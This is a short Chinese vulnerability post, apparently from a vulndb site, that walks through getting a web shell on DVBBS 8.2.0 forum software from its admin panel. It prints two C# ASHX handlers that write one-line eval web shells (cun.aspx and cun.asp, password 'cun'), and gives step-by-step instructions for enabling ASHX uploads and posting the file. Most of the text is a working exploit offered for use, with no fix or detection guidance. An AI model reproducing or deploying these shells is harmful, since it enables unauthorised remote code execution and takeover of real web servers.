DVBBS 8.2.0 后台 GET SHELL
- 发表于
- Vulndb
和添加PHP一样,如何上传的php不能解析,或则管理员将PHP禁用的另外一则方法
前提:支持ASPX,因为ASPX不能上传,我们需要上传的是ASHX
源码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"cun\"]"+",\"unsafe\");%>"; StreamWriter file1= File.CreateText(context.Server.MapPath("cun.aspx")); file1.Write(show); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } } |
保存为1.ashx
上传源码不行的话,尝试下面的源码
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("cun.asp")); file1.Write("GIF89a888<%Cun=REquEst(\"CUN\"):EvaL(Cun)%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } } |
后台 版面管理=》版面(分类)管理=》随便一个版面=》高级设置=》添加上传类型ASHX
然后前台发表新帖,上传ASHX,记得要发表帖子,ASHX才能保存
上传后,后台文件管理=》上传文件管理=》最近24小时内上传的文件,找到你的ASHX,如何是第一个1.ASHX源码,则会在同目录生成cun.aspx,密码cun,第二款源码会生成cun.asp,密码cun
原文连接:DVBBS 8.2.0 后台 GET SHELL
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
